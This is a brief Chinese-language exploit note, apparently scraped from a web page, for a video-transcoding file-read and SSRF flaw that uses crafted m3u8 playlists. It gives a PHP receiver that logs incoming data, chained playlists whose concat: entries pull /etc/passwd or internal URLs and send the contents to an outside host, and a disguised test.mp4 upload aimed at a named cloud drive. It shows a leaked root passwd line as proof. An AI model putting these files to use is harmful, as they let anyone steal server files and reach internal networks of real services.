Vulnerability exploit methods are as follows:php
一共4個文件:
comm.php (接收用的 也能夠用監聽一個端口)
bash
code 區域url
<?php file_put_contents(time()."_test.txt",$_GET['x']); ?>
header.m3u8 (視頻格式文件)
spa
code 區域ssr
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.u-url.org/exp/movie/comm.php?x=
remote.m3u8 (第二次轉發的)
code
code 區域視頻
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com #EXT-X-ENDLIST
code 區域blog
http://baidu.com 也能夠換成 本地資源文件: /etc/passwd
test.mp4 (最終上傳觸發)
資源
code 區域rem
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.u-url.org/exp/movie/remote.m3u8 #EXT-X-ENDLIST
漏洞證實:
一切準備號了以後就上傳test.mp4到360雲盤上去。
code 區域
root:x:0:0:root:/root:/bin/bash
也能夠ssrf
Detailed content link:
https://habrahabr.ru/company/mailru/blog/274855/